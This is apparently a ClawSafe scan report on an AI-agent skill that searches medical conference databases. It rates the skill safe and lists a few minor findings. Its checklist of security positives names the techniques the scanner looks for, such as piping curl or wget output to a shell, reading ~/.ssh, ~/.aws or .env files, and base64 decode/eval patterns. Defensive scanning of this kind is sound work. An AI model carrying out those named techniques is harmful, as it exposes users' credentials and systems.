medical-conference-search Security Report — Trusted | ClawSafe

5 /100

medical-conference-search

Search medical conference and presentation databases via the NoahAI API. Supports conference search, presentation search, and chained search workflows.

This is a straightforward medical conference search skill that makes HTTPS API calls to a single documented endpoint using a declared Bearer token — no malicious behavior detected.

Skill Namemedical-conference-search

Duration34.2s

Enginepi

✓

Safe to install

No action required. Optionally pin the requests library to a specific version to reduce supply-chain risk.

Findings 2 items

Severity	Finding	Location
Low	Unpinned 'requests' dependency The code imports requests without a version constraint. pip install requests without pinning could resolve to a vulnerable version. The import error handling on line 14 shows a helpful install message but does not enforce a safe version. `import requests` → Add a version constraint: pip install requests>=2.31.0	`scripts/search_chained.py:14`
Info	Unused import in all scripts urllib.parse.urljoin is imported in all three scripts but never used. This is harmless dead code. `from urllib.parse import urljoin` → Remove the unused import for cleaner code	`scripts/search_chained.py:13`

Resource	Declared	Inferred	Status	Evidence
Network	`READ`	`READ`	✓ Aligned	All three scripts POST to https://www.noah.bio/api/ with a Bearer token (SKILL.m…
Environment	`READ`	`READ`	✓ Aligned	os.environ.get('NOAH_API_TOKEN') accessed in all three scripts; declared in SKIL…
Filesystem	`NONE`	`WRITE`	✓ Aligned	--output flag writes to disk (search_chained.py line 310, search_conferences.py …
Shell	`NONE`	`NONE`	—	No subprocess, os.system, or shell=True calls found in any script
Skill Invoke	`NONE`	`NONE`	—	Scripts do not invoke other skills
Clipboard	`NONE`	`NONE`	—	No clipboard access detected
Browser	`NONE`	`NONE`	—	No browser automation detected
Database	`NONE`	`NONE`	—	No database access detected

3 findings

🔗

Medium External URL 外部 URL

https://noah.bio

SKILL.md:339

🔗

Medium External URL 外部 URL

https://www.noah.bio/api/

SKILL.md:345

🔗

Medium External URL 外部 URL

https://www.noah.bio

scripts/search_chained.py:40

File Tree

4 files · 39.9 KB · 1085 lines

Python 3f · 736L Markdown 1f · 349L

├─ ▾ 📁 scripts

│ ├─ 🐍 search_chained.py Python 319L · 11.6 KB

│ ├─ 🐍 search_conferences.py Python 208L · 7.3 KB

│ └─ 🐍 search_presentations.py Python 209L · 7.4 KB

└─ 📝 SKILL.md Markdown 349L · 13.5 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`requests`	`*`	pip	No	Version not pinned — floating dependency could resolve to a vulnerable version in some environments

Security Positives

✓ All network activity is confined to a single documented HTTPS endpoint: https://www.noah.bio/api/

✓ Bearer token is read from environment (NOAH_API_TOKEN), never hardcoded or exfiltrated

✓ No shell execution (subprocess, os.system, shell=True) in any script

✓ No credential harvesting — only the declared API token is accessed

✓ No sensitive local path access (~/.ssh, ~/.aws, .env files)

✓ No base64 decode/eval/exec patterns present

✓ No remote script download (curl|bash, wget|sh) or runtime installs

✓ Documentation fully matches implementation behavior — doc-to-code alignment is strong

✓ Scripts include proper error handling (ConnectionError, TimeoutError, HTTPError) with informative messages

✓ HTTP redirects are explicitly blocked (allow_redirects=False) to prevent redirect-based credential leakage

✓ The --output file write capability is explicitly documented in SKILL.md

Scan Report

Findings 2 items

File Tree

Dependencies 1 items

Security Positives